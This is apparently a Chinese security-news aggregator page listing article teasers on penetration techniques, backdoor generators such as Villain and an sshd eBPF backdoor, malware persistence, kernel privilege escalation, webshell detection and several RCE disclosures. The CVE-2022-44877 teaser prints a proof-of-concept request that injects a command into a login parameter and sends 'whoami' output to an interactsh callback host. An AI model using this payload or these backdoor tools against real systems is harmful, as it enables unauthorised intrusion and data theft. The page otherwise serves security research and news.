渗透技巧
N每日安全动态推送(1-29)
Tencent Security Xuanwu Lab Daily News• XML Security in Java:https://semgrep.dev/blog/2022/xml-security-in-java ・ Java...
NVillain - Windows&Linux后门生成器
安装与使用git clone https://github.com/t3l3machus/Villaincd ./Villainpip3 install -r requirements.txt以 root 身份运行:Villain.py [-h] [-p PORT] [-...
Nsshd_backdoor
sshd_backdoor This Project is based on BlackHat USA 2021 and Defcon 29. About Using ebpf technique, hijacking the process during sshd service getti...
NMalware development: persistence - part 21. Recycle Bin, My Documents COM extension handler. Simple C++ example.
﷽ Hello, cybersecurity enthusiasts and white hackers! This post is based on my own research into one of the more interesting malware persistenc...
NLinux内核pwn之基础rop提权
本文为看雪论坛优秀文章看雪论坛作者ID:mb_khygdqmu一基础知识1. linux kernel pwnkernel 也是一个程序,用来管理软件发出的数据 I/O 要求,将这些要求转义...
N高对抗内存型WebShell检测技术学习笔记
戳上面的蓝字关注我吧!01前言最近在读《信息安全学报》的时候,发现在22年11月份发布的刊文中有一篇《面向Java的高对抗内存型Webshell检测技术》[1],由中国...
N九大热门API安全工具
点击蓝字 关注我们 ///@GoUpSec随着云计算和移动计算的快速普及,API安全已经成为当下企业和互联网面临的最...
NMyBB <= 1.8.31: Remote Code Execution Chain
Visual editor persistent XSS CVE-2022-43707 (HIGH RISK) Some time ago, my colleague Igor Sak-Sakovskiy published an article: Fuzzing for XSS via ne...
NExploiting Hardcoded Keys to achieve RCE in Yellowfin BI
Introduction At Assetnote, we often audit enterprise software source code to discover pre-authentication vulnerabilities. Yellowfin BI had signific...
NControl Web Panel Linux 虚拟主机控制面板 RCE CVE-2022-44877
POC:POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1Host: vulnContent-Type: application/x-www-form-url...